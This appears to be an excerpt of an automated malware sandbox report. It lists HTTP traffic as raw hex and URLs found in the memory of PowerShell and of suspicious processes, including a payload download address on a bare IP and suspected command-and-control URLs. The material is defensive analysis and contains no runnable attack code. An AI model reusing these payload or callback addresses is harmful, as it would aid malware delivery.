3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 05 Dec 2024 04:40:27 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 05 Dec 2024 04:40:30 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 05 Dec 2024 04:40:33 GMTConnection: closeContent-Length: 5109Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.3/784/verygre
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIF
                  Source: powershell.exe, 00000003.00000002.2196881592.000000000322D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIFM
                  Source: powershell.exe, 00000003.00000002.2196881592.000000000322D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIFa
                  Source: powershell.exe, 00000003.00000002.2201238458.00000000079BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2439851510.000000000324C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                  Source: powershell.exe, 00000008.00000002.2474478084.0000000007755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                  Source: powershell.exe, 00000003.00000002.2201321954.0000000007A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                  Source: powershell.exe, 00000008.00000002.2474478084.0000000007755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.coX
                  Source: powershell.exe, 00000003.00000002.2199749880.0000000006336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000003.00000002.2198089199.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440544161.0000000004B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.Inastra.online
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000054F0000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000005B50000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.chalet-tofane.net:80/obbp/?ZrE=q8u4kFvwJtfA9Pl2Tc7XzAnO7IWA4JmOGaMFAF6owipiqs4LNofKQ6whCX
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/2019_Toyota_Land_Cruiser.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEX
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/Opel_Astra.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK82%2F
